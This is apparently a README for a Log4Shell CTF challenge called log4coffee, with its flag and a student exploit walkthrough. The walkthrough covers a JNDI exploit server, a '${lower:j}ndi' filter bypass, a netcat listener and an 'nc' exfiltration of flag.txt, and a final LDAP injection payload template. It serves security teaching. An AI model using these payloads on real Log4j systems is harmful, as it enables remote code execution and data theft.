# log4coffee: simple Log4j challenge. 

Basically just a remix of https://github.com/christophetd/log4shell-vulnerable-app intended for CTF.

A super professional app for coffee store :)

Flag: osu{m0r3_l1k3_l0g_4_fl@g}

## Resources for students 4 exploitation
Also provide a copy of code with the dockerfile to the students.

  1. [feihong's JNDI exploit tool](https://web.archive.org/web/20211211031401/https://objects.githubusercontent.com/github-production-release-asset-2e65be/314785055/a6f05000-9563-11eb-9a61-aa85eca37c76?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20211211%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20211211T031401Z&X-Amz-Expires=300&X-Amz-Signature=140e57e1827c6f42275aa5cb706fdff6dc6a02f69ef41e73769ea749db582ce0&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=314785055&response-content-disposition=attachment%3B%20filename%3DJNDIExploit.v1.2.zip&response-content-type=application%2Foctet-stream)
  2. [log4shell vulnerable app](https://github.com/christophetd/log4shell-vulnerable-app)
  3. [Reverse-shell one liners](https://github.com/Shiva108/CTF-notes/blob/master/Notes%20VA/Reverse%20shells%20one-liners.txt)

## Exploit:

### 1. Use feihong's JNDI exploit tool
To perform a real log4shell exploit you need to setup a LDAP & HTTP server with malicious code--feihong's JNDI exploit tool makes that really easy.

Just running the jar file via `java -jar <name of jar> -i <your public ip> -p <http port>` will get you ready to rumble.

### 2. Locate vulnerable log4j code (it's the comment section of the form)

The form handler at `CoffeeController.java` is pretty obviously vulnerable as it is the only log4j function call.

### 3. Bypass simple text filter

This just requires using some other log4j variable expansion.  E.g. "${lower:j}ndi" will evaluate to "jndi" in the `logger.info` call and pass the filter.

### 4. Setup netcat listener

`nc -lvp <port>`

### 5. Construct clever payload

Personally I just netcat'd the file contents away `cat "flag.txt" | nc <your ip> <port>`.

So my final payload was of the form: `${${lower:j}ndi:ldap://<endpoint>:<port>/Basic/Command/Base64/<base64 encoded payload>}`



